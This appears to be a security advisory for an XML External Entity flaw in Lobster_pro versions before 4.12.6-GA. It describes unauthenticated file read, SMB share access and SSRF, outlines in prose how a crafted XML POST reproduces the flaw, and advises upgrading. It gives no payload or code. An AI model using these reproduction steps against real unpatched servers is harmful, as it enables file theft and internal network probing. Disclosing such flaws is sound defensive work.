Lobster_pro XML External Entity Vulnerability Allowing Arbitrary File Read and SSRF

A vulnerability exists in Lobster_pro versions prior to 4.12.6-GA, allowing unauthenticated attackers to exploit the XML parser's handling of XML External Entities (XXE). This exploitation can lead to unauthorized read access of files on the application server and connected network shares. Additionally, the vulnerability allows for HTTP GET requests to be made to arbitrary services, potentially facilitating further exploitation.

Impact

Exploitation of this vulnerability could result in unauthorized access to sensitive files and directory listings from the application server or adjacent SMB shares. Such access might include confidential information, with the possibility of exfiltrating secrets through the retrieved files. The vulnerability also enables server-side request forgery (SSRF) attacks, which could be used to interact with internal services or resources.

Reproduction

The vulnerability can be reproduced by sending an HTTP POST request with a crafted XML payload that includes an external entity reference. The application will process the XML and follow the entity references, allowing the attacker to read files from the server or adjacent network shares. This can be verified by observing the response, which will include the requested file contents or directory listings.

Remediation

Users are advised to update Lobster_pro to version 4.12.6-GA or later.